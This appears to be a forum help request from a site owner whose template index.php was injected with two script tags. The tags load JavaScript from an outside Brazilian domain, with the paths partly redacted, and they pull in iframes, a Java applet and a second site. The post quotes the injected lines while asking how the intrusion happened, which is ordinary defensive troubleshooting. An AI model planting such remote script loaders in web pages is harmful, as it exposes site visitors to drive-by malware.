Something modified the index.php of my template to add this two lines of code before the tag (I deleted some part of the script for security reasons).
<script type="text/javascript" src="http://asaunirg.com.br/******"></script>
<script type="text/javascript" src="http://asaunirg.com.br/******"></script>
They open two iframes, a java applet and add a few scripts to the . Along with asaunirg.com.br it tries to connect to another site called facesta.com.br.
I solved it deleting the first two lines (the malicious scripts shown above) in the index.php file at my template folder. Does anyone have a clue of how could this malicious code be injected to my website?
